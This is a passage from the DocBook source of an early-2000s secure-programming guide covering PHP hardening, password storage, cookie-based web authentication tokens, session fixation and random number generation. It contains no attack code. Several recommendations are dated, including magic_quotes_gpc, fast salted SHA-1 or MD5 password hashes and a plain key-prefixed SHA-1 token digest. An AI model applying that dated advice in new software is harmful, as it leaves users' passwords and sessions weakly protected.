|
||
However, note that PHP doesn't have a particularly good
|
||
security vulnerability track record
|
||
(e.g., register_globals, a file upload problem, and a format
|
||
string problem in the error reporting library);
|
||
I believe that security issues were not considered sufficiently in
|
||
early editions of PHP;
|
||
I also think that the PHP developers are now emphasizing security
|
||
and that these security issues are finally getting worked out.
|
||
One evidence is the major change that the PHP developers have made to
|
||
get turn off register_globals; this had a significant impact on
|
||
PHP users, and their willingness to make this change is a good sign.
|
||
Unfortunately, it's not yet clear how secure PHP really is;
|
||
PHP just hasn't had much of a track record now that the developers
|
||
of PHP are examining it seriously for security issues.
|
||
Hopefully this will become clear quickly.
|
||
</para>
|
||
|
||
<para>
|
||
If you've decided to use PHP, here are some of my recommendations
|
||
(many of these recommendations are based on ways to counter
|
||
the issues that Clowes raises):
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Set the PHP configuration option
|
||
``register_globals'' off, and use PHP 4.2.0 or greater.
|
||
PHP 4.1.0 adds several special arrays, particularly $_REQUEST,
|
||
which makes it far simpler to develop software in PHP
|
||
when ``register_globals'' is off.
|
||
Setting register_globals off, which is the default in PHP 4.2.0,
|
||
completely eliminates the most common PHP attacks.
|
||
If you're assuming that register_globals is off, you should check for
|
||
this first (and halt if it's not true) - that way, people who install
|
||
your program will quickly know there's a problem.
|
||
Note that many third-party PHP applications cannot
|
||
work with this setting, so it can be difficult to
|
||
keep it off for an entire website.
|
||
It's possible to set register_globals off for only some programs.
|
||
For example, for Apache, you could insert these lines into the file .htaccess
|
||
in the PHP directory (or use Directory directives to control it further):
|
||
<programlisting>
|
||
php_flag register_globals Off
|
||
php_flag track_vars On
|
||
</programlisting>
|
||
However, the .htaccess file itself is ignored unless the Apache web server
|
||
is configured to permit overrides; often the Apache global configuration
|
||
is set so that AllowOverride is set to None.
|
||
So, for Apache users,
|
||
if you can convince your web hosting service to set ``AllowOverride Options''
|
||
in their configuration file (often /etc/http/conf/http.conf) for your
|
||
host, do that.
|
||
Then write helper functions to simplify loading the data you need
|
||
(and only that data).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
If you must develop software where register_globals might be on while
|
||
running (e.g., a widely-deployed PHP application),
|
||
always set values not provided by the user.
|
||
Don't depend on PHP
|
||
default values, and don't trust any variable you haven't explicitly set.
|
||
Note that you have to do this for <emphasis>every</emphasis> entry point
|
||
(e.g., every PHP program or HTML file using PHP).
|
||
The best approach is to begin each PHP program by setting all variables
|
||
you'll be using, even if you're simply resetting them to the
|
||
usual default values (like "" or 0).
|
||
This includes global variables referenced in included files,
|
||
even all libraries, transitively.
|
||
Unfortunately, this makes this recommendation hard to do, because few
|
||
developers truly know and understand all global variables that may be used
|
||
by all functions they call.
|
||
One lesser alternative is to search through HTTP_GET_VARS, HTTP_POST_VARS,
|
||
HTTP_COOKIE_VARS, and HTTP_POST_FILES to see if the user provided the data -
|
||
but programmers often forget to check all sources, and what happens if
|
||
PHP adds a new data source
|
||
(e.g., HTTP_POST_FILES wasn't in old versions of PHP).
|
||
Of course, this simply tells you how to make the best of a bad
|
||
situation; in case you haven't noticed yet, turn off
|
||
register_globals!
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Set the error reporting level to E_ALL, and resolve all errors reported
|
||
by it during testing.
|
||
Among other things, this will complain about un-initialized variables,
|
||
which are a key issues in PHP.
|
||
This is a good idea anyway whenever you start using PHP, because
|
||
this helps debug programs, too.
|
||
There are many ways to set the error reporting level, including in the
|
||
``php.ini'' file (global), the ``.htttpd.conf'' file (single-host),
|
||
the ``.htaccess'' file (multi-host), or at the top of the script
|
||
through the error_reporting function.
|
||
I recommend setting the error reporting level in both the php.ini file
|
||
and also at the top of the script; that way, you're protected if
|
||
(1) you forget to insert the command at the top of the script, or (2) move the
|
||
program to another machine and forget to change the php.ini file.
|
||
Thus, every PHP program should begin like this:
|
||
<programlisting width="66">
|
||
<?php error_reporting(E_ALL);?>
|
||
</programlisting>
|
||
It could be argued that this error reporting should be turned on
|
||
during development, but turned off when actually run on a real site
|
||
(since such error message could give useful information to an attacker).
|
||
The problem is that if they're disabled during ``actual use'' it's all
|
||
too easy to leave them disabled during development.
|
||
So for the moment, I suggest the simple approach of simply including it
|
||
in every entrance.
|
||
A much better approach is to record all errors, but direct the error reports
|
||
so they're only included in a log file
|
||
(instead of having them reported to the attacker).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Filter any user information used to create filenames carefully, in
|
||
particular to prevent remote file access.
|
||
PHP by default comes with ``remote files'' functionality -- that means
|
||
that file-opening commands like fopen(), that in other languages can
|
||
only open local files, can actually be used to invoke web or ftp
|
||
requests from another site.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Do not use old-style PHP file uploads; use the HTTP_POST_FILES array
|
||
and related functions.
|
||
PHP supports file uploads by uploading the file to some
|
||
temporary directory with a special filename.
|
||
PHP originally set a collection of variables to indicate where that filename
|
||
was, but since an attacker can control variable names and their values,
|
||
attackers could use that ability to cause great mischief.
|
||
Instead, always use HTTP_POST_FILES and related functions to access
|
||
uploaded files.
|
||
Note that even in this case, PHP's approach permits attackers to
|
||
temporarily upload files to you with arbitrary content, which is
|
||
risky by itself.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Only place protected entry points in the document tree; place all
|
||
other code (which should be most of it) outside the document tree.
|
||
PHP has a history of unfortunate advice on this topic.
|
||
Originally, PHP users were supposed to use the ``.inc'' (include)
|
||
extension for ``included'' files, but these included files often had
|
||
passwords and other information, and Apache would just give requesters
|
||
the contents of the ``.inc'' files when asked to do so when they
|
||
were in the document tree.
|
||
Then developers gave all files a ``.php'' extension - which meant that the
|
||
contents weren't seen, but now files never meant to be entry points
|
||
became entry points and were sometimes exploitable.
|
||
As mentioned earlier, the usual security advice is the best:
|
||
place only the proected entry points (files) in the document tree, and
|
||
place other code (e.g., libraries) outside the document tree.
|
||
There shouldn't be any ``.inc'' files in the document tree at all.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Avoid the session mechanism.
|
||
The ``session'' mechanism is handy for storing persistent data, but
|
||
its current implementation has many problems.
|
||
First, by default sessions store information in temporary files - so
|
||
if you're on a multi-hosted system, you open yourself up to many attacks and
|
||
revelations.
|
||
Even those who aren't currently multi-hosted may find themselves
|
||
multi-hosted later!
|
||
You can "tie" this information into a database instead of the filesystem,
|
||
but if others on a multi-hosted database can access that database with the
|
||
same permissions, the problem is the same.
|
||
There are also ambiguities if you're not careful
|
||
(``is this the session value or an attacker's value''?)
|
||
and this is another case where an attacker can force a file or
|
||
key to reside
|
||
on the server with content of their choosing - a dangerous situation -
|
||
and the attacker can even control to some extent the name of the file or key
|
||
where this data will be placed.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
For all inputs, check that they match a pattern for acceptability
|
||
(as with any language), and then use type casting to coerce non-string data
|
||
into the type it should have.
|
||
Develop ``helper'' functions to easily check and import a selected list
|
||
of (expected) inputs.
|
||
PHP is loosely typed, and this can cause trouble.
|
||
For example, if an input datum has the value "000", it won't be equal to "0"
|
||
nor is it empty().
|
||
This is particularly important for associative arrays, because their
|
||
indexes are strings; this means that $data["000"]
|
||
is different than $data["0"].
|
||
For example, to make sure $bar has type double (after making sure it
|
||
only has the format legal for a double):
|
||
<programlisting width="66">
|
||
$bar = (double) $bar;
|
||
</programlisting>
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Be especially careful of risky functions.
|
||
This includes those that perform PHP code execution
|
||
(e.g., require(), include(), eval(), preg_replace()),
|
||
command execution
|
||
(e.g., exec(), passthru(), the backtick operator, system(), and popen()),
|
||
and open files
|
||
(e.g., fopen(), readfile(), and file()).
|
||
This is not an exhaustive list!
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Use magic_quotes_gpc() where appropriate - this eliminates many kinds of
|
||
attacks.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Avoid file uploads, and consider modifying the php.ini file to
|
||
disable them (file_uploads = Off).
|
||
File uploads have had security holes in the past, so on older PHP's this
|
||
is a necessity, and until more experience shows that they're safe this
|
||
isn't a bad thing to remove.
|
||
Remember, in general, to secure a system you should disable or remove
|
||
anything you don't need.
|
||
<!--
|
||
http://lwn.net/2002/0307/a/php-upload.php3
|
||
-->
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="special">
|
||
<title>Special Topics</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 16:22 (NIV)</attribution>
|
||
<para>
|
||
Understanding is a fountain of life to those who have it,
|
||
but folly brings punishment to fools.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<sect1 id="passwords">
|
||
<title>Passwords</title>
|
||
|
||
<para>
|
||
Where possible, don't write code to handle passwords.
|
||
In particular, if the application is local,
|
||
try to depend on the normal login authentication by a user.
|
||
If the application is a CGI script, try to depend on the web server to provide
|
||
the protection as much as possible -
|
||
but see below about handling authentication in a web server.
|
||
If the application is over a network, avoid sending the password as cleartext
|
||
(where possible) since it can
|
||
be easily captured by network sniffers and reused later.
|
||
``Encrypting'' a password using some key fixed in the algorithm or using
|
||
some sort of shrouding algorithm is essentially the same as sending the
|
||
password as cleartext.
|
||
</para>
|
||
|
||
<!-- ???: Show _HOW_ to use PAM to do simple password checking; the PAM
|
||
docs are complex on this score. Also show how to ``fall through''
|
||
if you don't have PAM? -->
|
||
|
||
<para>
|
||
For networks, consider at least using digest passwords.
|
||
Digest passwords are passwords developed from hashes; typically the
|
||
server will send the client some data (e.g., date, time, name of server),
|
||
the client combines this data with the user password, the client hashes
|
||
this value (termed the ``digest pasword'')
|
||
and replies just the hashed result to the server;
|
||
the server verifies this hash value.
|
||
This works, because the password is never actually sent in any form; the
|
||
password is just used to derive the hash value.
|
||
Digest passwords aren't considered ``encryption'' in
|
||
the usual sense and are usually accepted even in countries with laws
|
||
constraining encryption for confidentiality.
|
||
Digest passwords are vulnerable to active attack threats but
|
||
protect against passive network sniffers.
|
||
One weakness is that, for digest passwords
|
||
to work, the server must have all the unhashed passwords, making the server
|
||
a very tempting target for attack.
|
||
</para>
|
||
|
||
<para>
|
||
If your application permits users to set their passwords, check
|
||
the passwords and permit only ``good'' passwords
|
||
(e.g., not in a dictionary, having certain minimal length, etc.).
|
||
You may want to look at information such as
|
||
<ulink
|
||
url="http://consult.cern.ch/writeup/security/security_3.html">http://consult.cern.ch/writeup/security/security_3.html</ulink>
|
||
on how to choose a good password.
|
||
You should use PAM if you can, because it supports pluggable password checkers.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="web-authentication">
|
||
<title>Authenticating on the Web</title>
|
||
<para>
|
||
On the web, a web server is usually authenticated to users by using SSL or TLS
|
||
and a server certificate - but it's not as easy to authenticate who
|
||
the users are.
|
||
SSL and TLS do support client-side certificates, but there are many practical
|
||
problems with actually using them (e.g., web browsers don't support a single
|
||
user certificate format and users find it difficult to install them).
|
||
You can learn about how to set up digital certificates from many places, e.g.,
|
||
<ulink url="http://www.petbrain.com/modules.php?op=modload&name=pki&file=index">Petbrain</ulink>.
|
||
Using Java or Javascript has its own problems, since many users disable them,
|
||
some firewalls filter them out, and they tend to be slow.
|
||
In most cases, requiring every user to install a plug-in is impractical too,
|
||
though if the system is only for an intranet for a relatively
|
||
small number of users this may be appropriate.
|
||
</para>
|
||
|
||
<para>
|
||
If you're building an intranet application, you should generally use
|
||
whatever authentication system is used by your users.
|
||
Unix-like systems tend to use Kerberos, NIS+, or LDAP.
|
||
You may also need to deal with a Windows-based authentication schemes
|
||
(which can be viewed as proprietary variants of Kerberos and LDAP).
|
||
Thus, if your organization depend on Kerberos,
|
||
design your system to use Kerberos.
|
||
Try to separate the authentication system from the rest of your application,
|
||
since the organization may (will!) change their authentication system over
|
||
time.
|
||
</para>
|
||
|
||
<para>
|
||
Many techniques don't work or don't work very well.
|
||
One approach that works in some cases
|
||
is to use ``basic authentication'', which is built into
|
||
essentially all browsers and servers.
|
||
Unfortunately, basic authentication sends passwords unencrypted, so it
|
||
makes passwords easy to steal; basic authentication by itself is really
|
||
useful only for worthless information.
|
||
You could store authentication information in the URLs selected by the users,
|
||
but for most circumstances you should never do this - not only are
|
||
the URLs sent unprotected over the wire (as with basic authentication),
|
||
but there are too many other ways that
|
||
this information can leak to others
|
||
(e.g., through the browser history logs stored by many browsers,
|
||
logs of proxies, and to other web sites through the Referer: field).
|
||
You could wrap all communication with a web server using
|
||
an SSL/TLS connection (which would encrypt it); this is secure
|
||
(depending on how you do it), and it's
|
||
necessary if you have important data, but note that
|
||
this is costly in terms of performance.
|
||
You could also use ``digest authentication'', which exposes the communication
|
||
but at least authenticates the user without exposing the
|
||
underlying password used to authenticate the user.
|
||
Digest authentication is intended to be a simple partial solution for
|
||
low-value communications,
|
||
but digest authentication
|
||
is not widely supported in an interoperable way by web browsers and servers.
|
||
In fact, as noted in a March 18, 2002 eWeek article,
|
||
Microsoft's web client (Internet Explorer) and web server (IIS)
|
||
incorrectly implement the standard (RFC 2617), and thus won't work with
|
||
other servers or browsers. Since Microsoft
|
||
don't view this incorrect implementation as a serious
|
||
problem, it will be a very long time before most of their customers have
|
||
a correctly-working program.
|
||
<!-- http://www.eweek.com/article/0,3658,s=702&a=24177,00.asp -->
|
||
</para>
|
||
|
||
<para>
|
||
Thus, the most common technique for authenticating on the web today is
|
||
through cookies.
|
||
Cookies weren't really designed for this purpose, but they can be used
|
||
for authentication - but there are many wrong ways to use them that
|
||
create security vulnerabilities, so be careful.
|
||
For more information about cookies, see IETF RFC 2965, along with the
|
||
older specifications about them.
|
||
Note that to use cookies, some browsers (e.g., Microsoft
|
||
Internet Explorer 6) may insist that you
|
||
have a privacy profile (named p3p.xml on the root directory of the server).
|
||
</para>
|
||
|
||
<para>
|
||
Note that some users don't accept cookies, so this solution still has
|
||
some problems.
|
||
If you want to support these users,
|
||
you should send this authentication information back and forth via
|
||
HTML form hidden fields
|
||
(since nearly all browsers support them without concern).
|
||
You'd use the same approach as with cookies - you'd just use a different
|
||
technology to have the data sent from the user to the server.
|
||
Naturally, if you implement this approach, you need to include settings to
|
||
ensure that these pages aren't cached for use by others.
|
||
However, while I think avoiding cookies
|
||
is preferable, in practice these other approaches often require
|
||
much more development effort.
|
||
Since it's so hard to implement this on a large scale for many
|
||
application developers, I'm not currently stressing these approaches.
|
||
I would rather describe an approach that is reasonably secure and
|
||
reasonably easy to implement, than emphasize approaches that are too
|
||
hard to implement correctly (by either developers or users).
|
||
However, if you can do so without much effort, by all means support
|
||
sending the authentication information using form hidden fields and
|
||
an encrypted link (e.g., SSL/TLS).
|
||
As with all cookies, for these cookies you
|
||
should turn on the HttpOnly flag unless
|
||
you have a web browser script that must be able to read the cookie.
|
||
</para>
|
||
|
||
<para>
|
||
Fu [2001] discusses client authentication on the web, along with a
|
||
suggested approach, and this is the approach I suggest for most sites.
|
||
The basic idea is that client authentication is split into two parts,
|
||
a ``login procedure'' and ``subsequent requests.''
|
||
In the login procedure, the server asks for the user's username and password,
|
||
the user provides them, and the server replies with an
|
||
``authentication token''.
|
||
In the subsequent requests, the client (web browser)
|
||
sends the authentication token
|
||
to the server (along with its request); the server verifies that the
|
||
token is valid, and if it is, services the request.
|
||
Another good source of information about web authentication is
|
||
Seifried [2001].
|
||
</para>
|
||
|
||
<para>
|
||
One serious problem with some web authentication techniques is that
|
||
they are vulnerable to a problem called "session fixation".
|
||
In a session fixation attack, the attacker fixes the user's session ID
|
||
before the user even logs into the target server, thus eliminating the
|
||
need to obtain the user's session ID afterwards.
|
||
Basically, the attacker obtains an account, and then tricks another
|
||
user into using the attacker's account - often by creating a special
|
||
hypertext link and tricking the user into clicking on it.
|
||
A good paper describing session fixation is the paper by
|
||
<ulink url="http://www.acros.si/papers/session_fixation.pdf">
|
||
Mitja Kolsek [2002]</ulink>.
|
||
A web authentication system you use should be resistant to session fixation.
|
||
</para>
|
||
|
||
<sect2 id="web-authentication-login">
|
||
<title>Authenticating on the Web: Logging In</title>
|
||
<para>
|
||
The login procedure is typically implemented as an HTML form;
|
||
I suggest using the field names ``username'' and ``password'' so that
|
||
web browsers can automatically perform some useful actions.
|
||
Make sure that the password is sent over an encrypted connection
|
||
(using SSL or TLS, through an https: connection) - otherwise, eavesdroppers
|
||
could collect the password.
|
||
Make sure all password text fields are marked as passwords in the HTML,
|
||
so that the password text is not visible to
|
||
anyone who can see the user's screen.
|
||
</para>
|
||
|
||
<para>
|
||
If both the username and password fields are filled in,
|
||
do not try to automatically log in as that user.
|
||
Instead, display the login form with the user and password fields;
|
||
this lets the user verify that they really want to log in as that user.
|
||
If you fail to do this, attackers will be able to exploit this weakness to
|
||
perform a session fixation attack.
|
||
Paranoid systems might want simply ignore the password field and make the
|
||
user fill it in, but this interferes with browsers which can store
|
||
passwords for users.
|
||
</para>
|
||
|
||
<para>
|
||
When the user sends username and password, it must be checked against
|
||
the user account database.
|
||
This database shouldn't store the passwords ``in the clear'', since if
|
||
someone got a copy of the this database they'd suddenly get everyone's
|
||
password (and users often reuse passwords).
|
||
Some use crypt() to handle this, but crypt can only handle a small
|
||
input, so I recommend using a different approach (this is my approach -
|
||
Fu [2001] doesn't discuss this).
|
||
Instead, the user database should store a username, salt, and
|
||
the password hash for that user.
|
||
The ``salt'' is just a random sequence of characters, used to make it
|
||
harder for attackers to determine a password even if they get the
|
||
password database - I suggest an 8-character random sequence.
|
||
It doesn't need to be cryptographically random, just different from
|
||
other users.
|
||
The password hash should be computed by concatenating
|
||
``server key1'', the user's password, and the salt, and
|
||
then running a cryptographically secure hash algorithm.
|
||
Server key1 is a secret key unique to this server - keep it separate
|
||
from the password database.
|
||
Someone who has server key1 could then run programs to crack user
|
||
passwords if they also had the password database;
|
||
since it doesn't need to be memorized, it can be a long and complex
|
||
password.
|
||
Most secure would be HMAC-SHA-1 or HMAC-MD5;
|
||
you could use SHA-1 (most web sites aren't really worried about
|
||
the attacks it allows) or MD5 (but MD5 would be poorer choice;
|
||
see the discussion about MD5).
|
||
</para>
|
||
|
||
<para>
|
||
Thus, when users create their accounts, the password is hashed and
|
||
placed in the password database.
|
||
When users try to log in, the purported password is hashed and compared
|
||
against the hash in the database (they must be equal).
|
||
When users change their password, they should type in both the old
|
||
and new password, and the new password twice (to make sure they didn't
|
||
mistype it); and again, make sure none of these password's characters
|
||
are visible on the screen.
|
||
</para>
|
||
|
||
<para>
|
||
By default, don't save the passwords themselves on the client's
|
||
web browser using cookies - users may sometimes use shared clients
|
||
(say at some coffee shop).
|
||
If you want, you can give users the option of ``saving the password''
|
||
on their browser, but if you do, make sure that the password is set to
|
||
only be transmitted on ``secure'' connections, and make sure the user has
|
||
to specifically request it (don't do this by default).
|
||
</para>
|
||
|
||
<para>
|
||
Make sure that the page is marked to not be cached, or a proxy
|
||
server might re-serve that page to other users.
|
||
</para>
|
||
|
||
<para>
|
||
Once a user successfully logs in, the server needs to send the client
|
||
an ``authentication token'' in a cookie, which is described next.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="web-authentication-subsequent">
|
||
<title>Authenticating on the Web: Subsequent Actions</title>
|
||
<para>
|
||
Once a user logs in, the server sends back to the client a cookie
|
||
with an authentication token that will be used from then on.
|
||
A separate authentication token is used, so that users don't need to keep
|
||
logging in, so that passwords aren't continually sent back and forth, and
|
||
so that unencrypted communication can be used if desired.
|
||
A suggested token (ignoring session fixation attacks) would look like this:
|
||
<programlisting>
|
||
exp=t&data=s&digest=m
|
||
</programlisting>
|
||
Where t is the expiration time of the token (say, in several hours),
|
||
and data s identifies the user (say, the user name or session id).
|
||
The digest is a keyed digest of the other fields.
|
||
Feel free to change the field name of ``data'' to be more descriptive
|
||
(e.g., username and/or sessionid).
|
||
If you have more than one field of data (e.g., both a username and a
|
||
sessionid), make sure the digest uses both the field names and data values
|
||
of all fields you're authenticating; concatenate them with a pattern
|
||
(say ``%%'', ``+'', or ``&'')
|
||
that can't occur in any of the field data values.
|
||
As described in a moment, it would be a good idea to include a username.
|
||
The keyed digest should be a cryptographic hash of the other information in
|
||
the token, keyed using a different server key2.
|
||
The keyed digest should use HMAC-MD5 or HMAC-SHA1, using a different server
|
||
key (key2), though simply using SHA1 might be okay for some purposes
|
||
(or even MD5, if the risks are low).
|
||
Key2 is subject to brute force guessing attacks, so it should be
|
||
long (say 12+ characters) and unguessable; it does NOT need to be easily
|
||
remembered.
|
||
If this key2 is compromised, anyone can authenticate to the server, but
|
||
it's easy to change key2 - when you do, it'll simply force currently
|
||
``logged in'' users to re-authenticate.
|
||
See Fu [2001] for more details.
|
||
</para>
|
||
|
||
<para>
|
||
There is a potential weakness in this approach.
|
||
I have concerns that Fu's approach, as originally described, is weak against
|
||
session fixation attacks (from several different directions, which
|
||
I don't want to get into here).
|
||
Thus, I now suggest modifying Fu's approach and using this token format
|
||
instead:
|
||
<programlisting>
|
||
exp=t&data=s&client=c&digest=m
|
||
</programlisting>
|
||
This is the same as the original Fu aproach, and older versions of
|
||
this book (before December 2002) didn't suggest it.
|
||
This modification adds a new
|
||
"client" field to uniquely identify the client's current location/identity.
|
||
The data in the client field should be something that should change
|
||
if someone else tries to use the account; ideally, its new value should be
|
||
unguessable, though that's hard to accomplish in practice.
|
||
Ideally the client field would be the client's SSL client certificate,
|
||
but currently that's a suggest that is hard to meet.
|
||
At the least, it should be the user's IP address (as perceived from
|
||
the server, and remember to plan for IPv6's longer addresses).
|
||
This modification doesn't completely counter session fixation attacks,
|
||
unfortunately (since if an attacker can determine what the user
|
||
would send, the attacker may be able to make a request to a server
|
||
and convince the client to accept those values).
|
||
However, it does add resistance to the attack.
|
||
Again, the digest must now include all the other data.
|
||
</para>
|
||
|
||
<para>
|
||
Here's an example.
|
||
If a user logs into foobar.com sucessfully, you might establish
|
||
the expiration date as 2002-12-30T1800 (let's assume we'll transmit as
|
||
ASCII text in this format for the moment), the username as "fred",
|
||
the client session as "1234", and you might determine that the
|
||
client's IP address was 5.6.7.8.
|
||
If you use a simple SHA-1 keyed digest
|
||
(and use a key prefixing the rest of the data), with the server key2 value of
|
||
"rM!V^m~v*Dzx", the digest could be computed over:
|
||
<programlisting>
|
||
exp=2002-12-30T1800&user=fred&session=1234&client=5.6.7.8
|
||
</programlisting>
|
||
A keyed digest can be computed by running a cryptographic hash code
|
||
over, say, the server key2, then the data;
|
||
in this case, the digest would be:
|
||
<programlisting>
|
||
101cebfcc6ff86bc483e0538f616e9f5e9894d94
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
From then on, the server must check the expiration time and recompute the
|
||
digest of this authentication token, and only accept client requests
|
||
if the digest is correct.
|
||
If there's no token, the server should reply with the user login page
|
||
(with a hidden form field to show where the successful login should go
|
||
afterwards).
|
||
</para>
|
||
|
||
<para>
|
||
It would be prudent to display the username, especially on important
|
||
screens, to help counter session fixation attacks.
|
||
If users are given feedback on their username, they may notice if they
|
||
don't have their expected username. This is helpful anyway if it's
|
||
possible to have an unexpected username (e.g., a family that shares the
|
||
same machine).
|
||
Examples of important screens include those when a file is uploaded
|
||
that should be kept private.
|
||
</para>
|
||
|
||
<para>
|
||
One odd implementation issue: although the specifications for the
|
||
"Expires:" (expiration time) field for cookies
|
||
permit time zones, it turns out that some versions of
|
||
Microsoft's Internet Explorer don't implement time zones correctly
|
||
for cookie expiration.
|
||
Thus, you need to always use UTC time (also called Zulu time)
|
||
in cookie expiration times for maximum portability.
|
||
<!-- http://lwn.net/Articles/11981/ -->
|
||
It's a good idea in general to use UTC time for time values,
|
||
and convert when necessary for human display, since this eliminates other
|
||
time zone and daylight savings time issues.
|
||
</para>
|
||
|
||
<para>
|
||
If you include a sessionid in the authentication token, you can limit
|
||
access further.
|
||
Your server could ``track'' what pages a user has seen in a given session,
|
||
and only permit access to other appropriate pages from that point
|
||
(e.g., only those directly linked from those page(s)).
|
||
For example,
|
||
if a user is granted access to page foo.html, and page foo.html has
|
||
pointers to resources bar1.jpg and bar2.png, then accesses to bar4.cgi
|
||
can be rejected.
|
||
You could even kill the session, though only do this if the authentication
|
||
information is valid (otherwise, this would make it possible for
|
||
attackers to cause denial-of-service attacks on other users).
|
||
This would somewhat limit the access an attacker has, even if they
|
||
successfully hijack a session, though clearly an attacker with time
|
||
and an authentication token
|
||
could ``walk'' the links just as a normal user would.
|
||
</para>
|
||
|
||
<para>
|
||
One decision is whether or not to require the authentication token and/or
|
||
data to be sent over a secure connection (e.g., SSL).
|
||
If you send an authentication token
|
||
in the clear (non-secure), someone who intercepts the
|
||
token could do whatever the user could do until the expiration time.
|
||
Also, when you send data over an unencrypted link, there's the risk of
|
||
unnoticed change by an attacker; if you're worried that someone might change the
|
||
data on the way, then you need to authenticate the data being transmitted.
|
||
Encryption by itself doesn't guarantee authentication, but it does make
|
||
corruption more likely to be detected, and typical libraries can support
|
||
both encryption and authentication in a TLS/SSL connection.
|
||
In general, if you're encrypting a message, you should also authenticate it.
|
||
If your needs vary,
|
||
one alternative is to create two authentication tokens - one is used
|
||
only in a ``secure'' connection for important operations, while the other
|
||
used for less-critical operations.
|
||
Make sure the token used for ``secure'' connections is marked so that only
|
||
secure connections (typically encrypted SSL/TLS connections) are used.
|
||
If users aren't really different, the authentication token could omit
|
||
the ``data'' entirely.
|
||
</para>
|
||
|
||
<para>
|
||
Again, make sure that the pages with this authentication token aren't cached.
|
||
There are other reasonable schemes also; the goal of this text is
|
||
to provide at least one secure solution.
|
||
Many variations are possible.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="web-authentication-logout">
|
||
<title>Authenticating on the Web: Logging Out</title>
|
||
<para>
|
||
You should always provide users with a mechanism to ``log out'' - this
|
||
is especially helpful for customers using shared browsers
|
||
(say at a library).
|
||
Your ``logout'' routine's task is simple - just unset the client's
|
||
authentication token.
|
||
</para>
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="random-numbers">
|
||
<title>Random Numbers</title>
|
||
|
||
<para>
|
||
In many cases secure programs must generate ``random'' numbers that
|
||
cannot be guessed by an adversary.
|
||
Examples include session keys, public or private keys, symmetric keys,
|
||
nonces and IVs used in many protocols, salts, and so on.
|
||
Ideally, you should use a truly random source of data for random numbers,
|
||
such as values based on
|
||
radioactive decay (through precise timing of Geiger counter
|
||
clicks), atmospheric noise, or thermal noise in electrical circuits.
|
||
Some computers have a hardware component that functions as
|
||
a real random value generator, and if it's available you should use it.
|
||
</para>
|
||
|
||
<para>
|
||
However, most computers don't have hardware that generates truly
|
||
random values, so in most cases you need a way to generate random numbers
|
||
that is sufficiently random that an adversary can't predict it.
|
||
In general, this means that you'll need three things:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
An ``unguessable'' state; typically this is done by measuring
|
||
variances in timing of low-level devices
|
||
(keystrokes, disk drive arm jitter, etc.)
|
||
in a way that an adversary cannot control.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
A cryptographically strong pseudo-random number generator (PRNG), which
|
||
uses the state to generate ``random'' numbers.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
A large number of bits (in both the seed and the resulting value used).
|
||
There's no point in having a strong PRNG if you only have a few possible values,
|
||
because this makes it easy for an attacker to use brute force attacks.
|
||
The number of bits necessary varies depending on the circumstance, however,
|
||
since these are often used as cryptographic keys, the normal rules of
|
||
thumb for keys apply.
|
||
For a symmetric key (result), I'd use at least 112 bits (3DES), 128 bits is
|
||
a little better, and 160 bits or more is even safer.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Typically the PRNG uses the state to generate some values, and then
|
||
some of its values and other unguessable inputs are used to update the state.
|
||
There are lots of ways to attack these systems.
|
||
For example, if an attacker can control or view inputs to the state
|
||
(or parts of it), the attacker may be able
|
||
to determine your supposedly ``random'' number.
|
||
</para>
|
||
|
||
<para>
|
||
A real danger with PRNGs is that most computer language libraries include
|
||
a large set of pseudo-random number generators (PRNGs)
|
||
which are <emphasis>inappropriate</emphasis> for security purposes.
|
||
Let me say it again:
|
||
<emphasis>do not use typical random number generators for security
|
||
purposes</emphasis>.
|
||
Typical library PRNGs
|
||
are intended for use in simulations, games, and so on; they are
|
||
<emphasis remap="it">not</emphasis> sufficiently random for use
|
||
in security functions such as key generation.
|
||
Most non-cryptographic
|
||
library PRNGs are some variation of ``linear congruential generators'',
|
||
where the ``next'' random value is computed as "(aX+b) mod m"
|
||
(where X is the previous value).
|
||
Good linear congruential generators are fast and have useful statistical
|
||
properties, making them appropriate for their intended uses.
|
||
The problem with such PRNGs is that future values can be easily deduced
|
||
by an attacker (though they may appear random).
|
||
Other algorithms for generating random numbers quickly, such as
|
||
quadratic generators and cubic generators, have also been broken
|
||
[Schneier 1996].
|
||
In short, you have to use cryptographically strong PRNGs to
|
||
generate random numbers in secure applications - ordinary random number
|
||
libraries are not sufficient.
|
||
</para>
|
||
|
||
<para>
|
||
Failing to correctly generate truly random values for keys has caused
|
||
a number of problems, including holes in Kerberos,
|
||
the X window system, and NFS [Venema 1996].
|
||
</para>
|
||
|
||
<para>
|
||
If possible, you should use system services
|
||
(typically provided by the operating system) that are expressly designed
|
||
to create cryptographically secure random values.
|
||
For example,
|
||
the Linux kernel (since 1.3.30) includes a random number generator, which
|
||
is sufficient for many security purposes.
|
||
This random number generator gathers environmental noise
|
||
from device drivers and other sources into an entropy pool.
|
||
When accessed as /dev/random, random bytes are only returned
|
||
within the estimated number of bits of noise in the entropy pool
|
||
(when the entropy pool is empty, the call blocks until additional
|
||
environmental noise is gathered).
|
||
When accessed as /dev/urandom, as many bytes as are requested are
|
||
returned even when the entropy pool is exhausted.
|
||
If you are using the random values for cryptographic purposes (e.g.,
|
||
to generate a key) on Linux, use /dev/random.
|
||
*BSD systems also include /dev/random.
|
||
